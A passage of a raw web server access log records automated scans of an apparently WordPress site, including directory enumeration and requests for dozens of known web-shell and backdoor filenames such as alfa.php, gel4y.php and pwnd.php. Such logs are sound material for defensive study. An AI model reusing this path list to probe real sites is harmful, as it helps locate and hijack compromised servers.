Gecko/20100101 Firefox/75.0" 138.199.60.185 - - [20/Dec/2025:14:52:24 -0500] "GET /wp-content/themes/travelscape/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 138.199.60.185 - - [20/Dec/2025:14:52:25 -0500] "GET /wp-includes/images/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 138.199.60.185 - - [20/Dec/2025:14:52:25 -0500] "GET /admin/editor/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 195.24.237.215 - - [20/Dec/2025:14:54:44 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 167.99.235.187 - - [20/Dec/2025:14:59:19 -0500] "GET /admin/imger/io.jpg HTTP/1.1" 301 795 "http://taxhelplines.com.pk/admin/imger/io.jpg" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:22 -0500] "GET /wp-includes/sodium_compat/src/Core32/Poly1305/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:22 -0500] "GET /wp-includes/blocks/post-author/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:22 -0500] "GET /wp-includes/block-supports/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:23 -0500] "GET /wp-includes/rest-api/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:23 -0500] "GET /wp-includes/blocks/block/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:24 -0500] "GET /wp-content/plugins/WordPressCore/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 138.199.60.185 - - [20/Dec/2025:14:52:24 -0500] "GET /wp-includes/block-bindings/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:25 -0500] "GET /wp-includes/blocks/archives/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 138.199.60.185 - - [20/Dec/2025:14:52:25 -0500] "GET /wp-includes/sodium_compat/namespaced/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 138.199.60.185 - - [20/Dec/2025:14:52:25 -0500] "GET /wp-content/plugins/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 138.199.60.185 - - [20/Dec/2025:14:52:26 -0500] "GET /.well-known/pki-validation/ HTTP/1.1" 200 2060 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 195.24.237.215 - - [20/Dec/2025:14:54:44 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 195.24.237.215 - - [20/Dec/2025:14:54:44 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 195.24.237.215 - - [20/Dec/2025:14:54:45 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 195.24.237.215 - - [20/Dec/2025:14:54:46 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 195.24.237.215 - - [20/Dec/2025:14:54:46 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 13.84.156.6 - - [20/Dec/2025:14:59:23 -0500] "HEAD /wordpress HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:00:43 -0500] "HEAD /Wordpress HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:03:40 -0500] "HEAD /wp HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:04:51 -0500] "HEAD /Wp HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:06:16 -0500] "HEAD /WP HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:10:29 -0500] "HEAD /OLD HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:13:41 -0500] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:17:40 -0500] "HEAD /2022 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:01:24 -0500] "HEAD /WORDPRESS HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:02:33 -0500] "HEAD /WordPress HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:07:23 -0500] "HEAD /old HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:08:49 -0500] "HEAD /Old HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:11:11 -0500] "HEAD /oldsite HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:14:20 -0500] "HEAD /New HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:15:20 -0500] "HEAD /NEW HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:16:39 -0500] "HEAD /wp-old HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:19:44 -0500] "HEAD /2024 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:21:50 -0500] "HEAD /2020 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:23:04 -0500] "HEAD /2019 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:32 -0500] "GET /about/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:23:32 -0500] "GET /wp-file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:33 -0500] "GET /chosen.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:33 -0500] "GET /info.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:33 -0500] "GET /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:33 -0500] "GET /wp-content/themes/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:34 -0500] "GET /chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:35 -0500] "GET /mah/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:35 -0500] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:35 -0500] "GET /wp-content/themes/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:35 -0500] "GET /hplfuns.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:23:36 -0500] "GET /.well-known/acme-challenge/file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:36 -0500] "GET /sts.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:37 -0500] "GET /wp-signin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:37 -0500] "GET /wp-content/admin-header.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:38 -0500] "GET /mah.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:38 -0500] "GET /mah/function.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:38 -0500] "GET /akcc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 13.84.156.6 - - [20/Dec/2025:15:18:37 -0500] "HEAD /2023 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:20:38 -0500] "HEAD /2017 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:32 -0500] "GET /wp-includes/Requests/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:32 -0500] "GET /aa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:32 -0500] "GET /wp-admin/network/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:33 -0500] "GET /num.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:34 -0500] "GET /edit.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:23:34 -0500] "GET /atomlib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:23:34 -0500] "GET /index/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:34 -0500] "GET /bolt.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:35 -0500] "GET /wp-good.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:36 -0500] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:23:36 -0500] "GET /themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:36 -0500] "GET /file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:23:37 -0500] "GET /wp-blog.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:37 -0500] "GET /adminfuns.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:37 -0500] "GET /ahax.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:38 -0500] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:38 -0500] "GET /filemanager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:39 -0500] "GET /404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:39 -0500] "GET /wp-includes/assets/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:39 -0500] "GET /form.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:39 -0500] "GET /wp-admin/css/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:23:39 -0500] "GET /x.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:40 -0500] "GET /test.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:23:41 -0500] "GET /about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:41 -0500] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:41 -0500] "GET /goods.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:23:41 -0500] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:42 -0500] "GET /wp-includes/wp-atom.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:23:42 -0500] "GET /wp-themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:43 -0500] "GET /wp-admin/css/colors/ocean/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:43 -0500] "GET /gel4y.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:43 -0500] "GET /fm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:44 -0500] "GET /radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:44 -0500] "GET /simple.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:44 -0500] "GET /1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:45 -0500] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:46 -0500] "GET /vx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:46 -0500] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:23:40 -0500] "GET /k.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:40 -0500] "GET /wp-content/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:40 -0500] "GET /admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:40 -0500] "GET /bless.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:41 -0500] "GET /403.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:42 -0500] "GET /alfa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:42 -0500] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:42 -0500] "GET /wp-admin/wp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:43 -0500] "GET /defaults.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:43 -0500] "GET /autoload_classmap/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:44 -0500] "GET /wp-links-opml.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:44 -0500] "GET /manager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:23:45 -0500] "GET /admin.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:23:45 -0500] "GET /av.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:23:45 -0500] "GET /buy.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:45 -0500] "GET /dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:46 -0500] "GET /inputs.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:47 -0500] "GET /new.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:47 -0500] "GET /function/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:47 -0500] "GET /inputs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:23:46 -0500] "GET /xmrlpc.php 